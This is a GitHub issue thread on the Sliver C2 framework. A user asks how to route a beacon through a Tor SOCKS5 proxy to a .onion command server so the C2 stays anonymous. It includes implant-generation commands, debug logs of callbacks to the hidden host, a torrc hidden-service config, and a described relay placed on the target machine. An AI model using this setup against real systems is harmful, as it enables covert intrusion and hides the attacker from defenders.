search

BishopFox / sliver

Adversary Emulation Framework
GNU General Public License v3.0
7.87k stars 1.05k forks source link

Beacon through SOCKS5 Proxy, C2 behind .onion? #1698

Open pixelBaron117 opened 1 month ago

pixelBaron117 commented 1 month ago

Hello,

I've done some research but couldn't find a clear answer to my question.

Sliver supports handling HTTP proxies, but apparently not SOCKS5 proxies.

Therefore, I would like to know if it is possible to configure a beacon to use a pre-installed SOCKS5 proxy on the client.

For example:

generate beacon --http dasdasdas.onion --proxy socks5://127.0.0.1:9050 --os windows --arch amd64 --format exe --save /var/www/html

The goal is to keep the C2 anonymous without expensive intermediary servers.

As a starting solution, I found tor2web, but the domains are not stable over time, which reduces the robustness of the link (if a domain no longer works, then the beacon is no longer accessible). Setting up a tor2web reduces anonymity and has a certain cost.

Thank you in advance.

pixelBaron117 commented 1 month ago

generate --http [hidden].onion:6969?proxy=127.0.0.1:9050 -o windows -G -d -O dbg 

sliver > jobs

 ID   Name   Protocol   Port   Stage Profile 
==== ====== ========== ====== ===============
 11   http   tcp        6969

output : 

2024/05/22 20:35:30 session.go:172: Connecting -> http(s)://[hidden].onion:6969
2024/05/22 20:35:30 session.go:84: Next CC = https://[hidden].onion:6969?proxy=127.0.0.1:9050
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 transports.go:92: Yield c2 uri = 'https://[hidden].onion:6969?proxy=127.0.0.1:9050'
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = rpc, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2354917 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = register, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2394831 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 session.go:178: http(s) connection error Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:158: [session] failed to establish connection: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:138: Reconnect sleep: 1m0s

It seems the proxy is correctly used, but the sessions can't connect to the hidden service.

The hidden service Tor configuration:

GNU nano 6.2                          torrc                                   
# This is the configuration for Tor
SocksPort 9050 # 

# HiSer
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 6969 127.0.0.1:6969

Based on the debug output, the implant seems to behave correctly, using the proxy and sending HTTP requests. According to my information, the Tor proxy is compatible with standard HTTP requests. Therefore, I don't understand why it isn't working.

pixelBaron117 commented 3 weeks ago

While waiting for potential integration into Sliver, I've created a Python script that serves as a relay to route communications through the Tor network using an mTLS agent. How It Works:

Agent Communication:
    The Sliver agent is configured to communicate with 127.0.0.1:6666, thinking it is directly talking to the Sliver C2 server.

Proxy on the Target:
    A Python proxy script runs on the target machine and listens on 127.0.0.1:6666 for incoming connections from the Sliver agent.

Redirection Through Tor:
    The proxy script establishes a connection to the Sliver C2 server using the Tor network. This is done through a SOCKS5 proxy running on 127.0.0.1:9050 towards the hidden service (.onion address).

Data Forwarding:
    The script forwards all data from the Sliver agent to the Sliver C2 server through Tor and sends back responses to the agent, ensuring seamless bidirectional communication.

Detailed Setup: Sliver C2 Server:

The Sliver C2 server listens on port 9999 for incoming connections.

Tor Hidden Service:

Configure the hidden service to listen on port 9999 and forward traffic to port 9999 on the Sliver C2 server.
The .onion address of this hidden service is used by the proxy script to route traffic through Tor.

Python Proxy Script:

The proxy script runs on the target machine.
It listens on 127.0.0.1:6666 for connections from the Sliver agent.
When a connection is received, the proxy script uses PySocks to establish a connection to the hidden service address through the Tor network.
It then forwards all data from the Sliver agent to the Sliver C2 server through the Tor network and vice versa.

This setup allows the mTLS agent to route its communications securely through the Tor network without any modifications to the Sliver agent itself.

I am currently testing its robustness not sur if it will work great.....